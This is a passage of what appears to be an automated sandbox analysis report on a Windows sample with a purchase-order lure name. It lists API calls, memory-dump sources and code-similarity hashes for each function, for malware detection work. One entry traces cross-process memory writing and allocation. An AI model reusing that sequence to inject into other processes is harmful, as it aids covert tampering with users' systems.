                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorHandling__87except__start
                        • String ID: pow
                        • API String ID: 2905807303-2276729525
                        • Opcode ID: 4c7694a540dbb92d97039e349b9840213725aeb23c8493f1753a406c1263c7ad
                        • Instruction ID: 6c77c31318cd9ebe95fa20c92c4e83883476bea4d36746f64d582951bff2eb02
                        • Opcode Fuzzy Hash: 4c7694a540dbb92d97039e349b9840213725aeb23c8493f1753a406c1263c7ad
                        • Instruction Fuzzy Hash: 2D516A21D382078ADB15BF14C94137A7BA89B40711F208D2BF4D68A7E9DB348DB49A47
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID: #$+
                        • API String ID: 0-2552117581
                        • Opcode ID: 2c754e84f0483ac1df36d29e8c96ce9d00750fbc00509afd5d516a39bc1e88b1
                        • Instruction ID: 4bed2175b854308e72835f04ed26fc2e5631d851bc0cd77fa3eceac91f42b0aa
                        • Opcode Fuzzy Hash: 2c754e84f0483ac1df36d29e8c96ce9d00750fbc00509afd5d516a39bc1e88b1
                        • Instruction Fuzzy Hash: 9C513334104366CFDF16EF69D480BFA7BA4EF1A314F16416AF8819B2A0D7709C62CB60
                        APIs
                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0034DC40,?,0000000F,0000000C,00000016,0034DC40,?), ref: 002F507B
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                          • Part of subcall function 002BB8A7: _memmove.LIBCMT ref: 002BB8FB
                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 002F50FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                        • String ID: REMOVE$THIS
                        • API String ID: 2528338962-776492005
                        • Opcode ID: 5c4831b82addd50db9ef4de6079ee42348f1ae4cad48b61a3b2c64bfbda49d68
                        • Instruction ID: 7c1fa5b1ac03a522eacadf991cc316fe04e1cdf76c96e76db84cd6d38aa7e13a
                        • Opcode Fuzzy Hash: 5c4831b82addd50db9ef4de6079ee42348f1ae4cad48b61a3b2c64bfbda49d68
                        • Instruction Fuzzy Hash: 9D419334A2061A9FCF01DF54C881BBEB7B5BF48384F048069EA5AAB392D774AD55CF50
                        APIs
                          • Part of subcall function 002F4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002EC9FE,?,?,00000034,00000800,?,00000034), ref: 002F4D6B
                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002ECFC9
                          • Part of subcall function 002F4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002ECA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 002F4D36
                          • Part of subcall function 002F4C65: GetWindowThreadProcessId.USER32(?,?), ref: 002F4C90
                          • Part of subcall function 002F4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002EC9C2,00000034,?,?,00001004,00000000,00000000), ref: 002F4CA0
                          • Part of subcall function 002F4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002EC9C2,00000034,?,?,00001004,00000000,00000000), ref: 002F4CB6
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002ED036
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002ED083
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                        • String ID: @
                        • API String ID: 4150878124-2766056989
                        • Opcode ID: 1ccab7e5521a372239fdf686ae0847244ace678a12c042fa3708cee3d108ea0f
                        • Instruction ID: 6a5d5981b68f1ad42d124d46208b7dc2add3c686ba72947e0dbaa1a4a2b75643
                        • Opcode Fuzzy Hash: 1ccab7e5521a372239fdf686ae0847244ace678a12c042fa3708cee3d108ea0f
                        • Instruction Fuzzy Hash: A3415C7290021CAEDB11EFA4CD81BEEB778EF09740F048095EA55B7191DA706E55CF60
                        APIs
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0034DBF0,00000000,?,?,?,?), ref: 0031A4E6
                        • GetWindowLongW.USER32 ref: 0031A503
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0031A513
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID: SysTreeView32
                        • API String ID: 847901565-1698111956
                        • Opcode ID: 01b1d24c5750d01996b3adc973c3066d5d9c807ecb69c1d30b464916bee80d15
                        • Instruction ID: 7fec316964ef1d7c252527bc32453b2bbbe990ce5997a49b2d4566100cd53a36
                        • Opcode Fuzzy Hash: 01b1d24c5750d01996b3adc973c3066d5d9c807ecb69c1d30b464916bee80d15
                        • Instruction Fuzzy Hash: 7931D231205A05AFDB268E78CC45BE67BA9EB49335F214715F8B5932E0CB30E8A09B51
                        APIs
                        • _memset.LIBCMT ref: 003057E7
                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0030581D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CrackInternet_memset
                        • String ID: ?K0$|
                        • API String ID: 1413715105-628506199
                        • Opcode ID: 9780420511376608567ec922ce04259cc16b0a41f45e74f0b05b152571692597
                        • Instruction ID: 217530a7ef18390e28121cb9620df6b463e9b25e1de48510c97fb40481f688ef
                        • Opcode Fuzzy Hash: 9780420511376608567ec922ce04259cc16b0a41f45e74f0b05b152571692597
                        • Instruction Fuzzy Hash: 4E311872D11119EBCF11AFA0CC95AEF7FB9FF18340F108015E815A6162DB319A16DF60
                        APIs
                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00319F6B
                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00319F7F
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00319FA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$Window
                        • String ID: SysMonthCal32
                        • API String ID: 2326795674-1439706946
                        • Opcode ID: f09a38ae277748a90704738eeed591e0b46f28b9344aecdb82dac6ce5445db84
                        • Instruction ID: eeb1cc19ef3c70b05d0d930c77d857ff05915d88400cc931d9c3690f1157cd4f
                        • Opcode Fuzzy Hash: f09a38ae277748a90704738eeed591e0b46f28b9344aecdb82dac6ce5445db84
                        • Instruction Fuzzy Hash: A421B232510218BBDF168F54CC86FEA3B79EF4C714F120215FA59AB1D0D6B5EC919B90
                        APIs
                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0031A74F
                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0031A75D
                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0031A764
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$DestroyWindow
                        • String ID: msctls_updown32
                        • API String ID: 4014797782-2298589950
                        • Opcode ID: 7eba9824023924bba48d10c9e1ddc6e9b58ed343d0dfd7c87b931d4d3eef839f
                        • Instruction ID: 9c849c35549e7f8ec73191ff77b4300afb213fbdb64b93aaf496be38f2df7f50
                        • Opcode Fuzzy Hash: 7eba9824023924bba48d10c9e1ddc6e9b58ed343d0dfd7c87b931d4d3eef839f
                        • Instruction Fuzzy Hash: CC219CB6600604AFEB16DF68DCC1EA737ADEB4A394F150059F9059B291CB70EC518AA1
                        APIs
                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0031983D
                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0031984D
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00319872
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$MoveWindow
                        • String ID: Listbox
                        • API String ID: 3315199576-2633736733
                        • Opcode ID: 687644483528c3ed45b14d662b86d5f27b1b221190caf59e7ee20ab8cf1923ae
                        • Instruction ID: 16086408d794afb779a3d3473039554d7c2b753e6a0ddc0425d667c866495621
                        • Opcode Fuzzy Hash: 687644483528c3ed45b14d662b86d5f27b1b221190caf59e7ee20ab8cf1923ae
                        • Instruction Fuzzy Hash: 6C21C232610118BFEB1A8F54DC85FEB3BAEEF8D754F128125F9159B190C6719C918BA0
                        APIs
                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0031A27B
                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0031A290
                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0031A29D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: msctls_trackbar32
                        • API String ID: 3850602802-1010561917
                        • Opcode ID: cf8a9f7bfeba69edc7a39524a75d213804aca51d299fe6e69d595a2c3b2a3241
                        • Instruction ID: 108ad6aef92def388a8685aa1f3f6261e99ed953044350f6df04994d29f79d68
                        • Opcode Fuzzy Hash: cf8a9f7bfeba69edc7a39524a75d213804aca51d299fe6e69d595a2c3b2a3241
                        • Instruction Fuzzy Hash: C611E771200608BBDB265F65CC46FD73BACEF8DB54F124518FA5596090D2729892DB60
                        APIs
                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,002D3028,?), ref: 002D2F79
                        • GetProcAddress.KERNEL32(00000000), ref: 002D2F80
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RoInitialize$combase.dll
                        • API String ID: 2574300362-340411864
                        • Opcode ID: 0d8f105bc6503a9fdcddcbd2726f07930907c08c836674e371962ad8c16d5932
                        • Instruction ID: a441fb7c64e1c91d759aede1d6a69b8be7d6e5b658b17352228d395fd426e9a1
                        • Opcode Fuzzy Hash: 0d8f105bc6503a9fdcddcbd2726f07930907c08c836674e371962ad8c16d5932
                        • Instruction Fuzzy Hash: 3DE01A74694301EFDB625F70ED89B55766CA718706F504424F106E15B0CBB544A4EF04
                        APIs
                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002D2F4E), ref: 002D304E
                        • GetProcAddress.KERNEL32(00000000), ref: 002D3055
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RoUninitialize$combase.dll
                        • API String ID: 2574300362-2819208100
                        • Opcode ID: 1b427076dbf9085c3322b92d67168bf045f614cf539a5e64767c7ceb00d7c91d
                        • Instruction ID: b3db54eba7872ec2809bfe138b5bbc9c6dae04b83a6daab493ecb9db7bc952cb
                        • Opcode Fuzzy Hash: 1b427076dbf9085c3322b92d67168bf045f614cf539a5e64767c7ceb00d7c91d
                        • Instruction Fuzzy Hash: 8CE092B4A54201EBDB379F61FE4DB453A6CB700702F500424F10EE11B0CBF44560EA15
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LocalTime__swprintf
                        • String ID: %.3d$WIN_XPe
                        • API String ID: 2070861257-2409531811
                        • Opcode ID: fd8d124b9d7cf124f995f3a1dc7a8d9ec7a6e9b7fe3d6aed8d59363b923c1ba2
                        • Instruction ID: a33623e95254e00283f3f2a772617aad3f80b9d3839e4d8c558939879e55bc66
                        • Opcode Fuzzy Hash: fd8d124b9d7cf124f995f3a1dc7a8d9ec7a6e9b7fe3d6aed8d59363b923c1ba2
                        • Instruction Fuzzy Hash: ABE01271C1802CEACB56C690AC469FAF37CAB14300F1488D3B916D1404D3359B68AB11
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,002CE69C,74DF0AE0,002CE5AC,0034DC28,?,?), ref: 002CE6B4
                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 002CE6C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetNativeSystemInfo$kernel32.dll
                        • API String ID: 2574300362-192647395
                        • Opcode ID: 403a28159815c54cefdea125a524920f91d1c3130e71ea338bcea604258bf58e
                        • Instruction ID: fd69e7d0d9608d2f3b74ec18e947864720bc1bc0dfa5cfd4bfbb0944c8bcd145
                        • Opcode Fuzzy Hash: 403a28159815c54cefdea125a524920f91d1c3130e71ea338bcea604258bf58e
                        • Instruction Fuzzy Hash: DFD0A734920F138FDB225F31F849B4336DCAB24301F12952DE487D1164D770C480C650
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,002CE6D9,?,002CE55B,0034DC28,?,?), ref: 002CE6F1
                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 002CE703
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: IsWow64Process$kernel32.dll
                        • API String ID: 2574300362-3024904723
                        • Opcode ID: 0864090a16d9dfb1758db6570ddfc59aaf9e8b7e0e26b016459bd0542c80a857
                        • Instruction ID: eb3fd5896a6e109eeff04ac6052bda6f6b8b758b6114ee23a36e4c36e1956d06
                        • Opcode Fuzzy Hash: 0864090a16d9dfb1758db6570ddfc59aaf9e8b7e0e26b016459bd0542c80a857
                        • Instruction Fuzzy Hash: 3DD05E349107138BDB212F21A888A437BD8AB04300F02852DE496D2190D670C4808790
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0030EBAF,?,0030EAAC), ref: 0030EBC7
                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0030EBD9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                        • API String ID: 2574300362-1816364905
                        • Opcode ID: 65654d7ef570b1dde869c52dda348d0008a2f099c24f6c77d450c11834fbe64f
                        • Instruction ID: ca1a94f65a183af5380a1ec7ed5660e86eef8a710d9a257f31bb0111f560c001
                        • Opcode Fuzzy Hash: 65654d7ef570b1dde869c52dda348d0008a2f099c24f6c77d450c11834fbe64f
                        • Instruction Fuzzy Hash: 33D0A734E087128FD7631F31F898B4236DCAB04304F11C829F497D12A0DF70D8808650
                        APIs
                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,002F135F,?,002F1440), ref: 002F1389
                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 002F139B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                        • API String ID: 2574300362-1071820185
                        • Opcode ID: f2beaada7283b07c0ff5fbd222c0271d7179618564fbc9305e75ea53ae039dd0
                        • Instruction ID: 658f49467fbb1456235319aec40f4f8c6c23342394a44ed9e636e756958666f1
                        • Opcode Fuzzy Hash: f2beaada7283b07c0ff5fbd222c0271d7179618564fbc9305e75ea53ae039dd0
                        • Instruction Fuzzy Hash: C9D0A938C14313DFD7220F74F848792BAE8AF14308F058869E587D2690DAB0C8A49B90
                        APIs
                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,002F1371,?,002F1519), ref: 002F13B4
                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 002F13C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                        • API String ID: 2574300362-1587604923
                        • Opcode ID: 7ca34df6d6989112f15f082f211e800c2175ce8f3972393bdaae0fd78d06c95c
                        • Instruction ID: 0e44528272d57650448351369b7539453387aa50772730490917f92544f1ad4a
                        • Opcode Fuzzy Hash: 7ca34df6d6989112f15f082f211e800c2175ce8f3972393bdaae0fd78d06c95c
                        • Instruction Fuzzy Hash: D3D0A930814713DFD7260F34F848692B6ECAB40304F008469E697D2668DAB0C8E08B90
                        APIs
                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00313AC2,?,00313CF7), ref: 00313ADA
                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00313AEC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
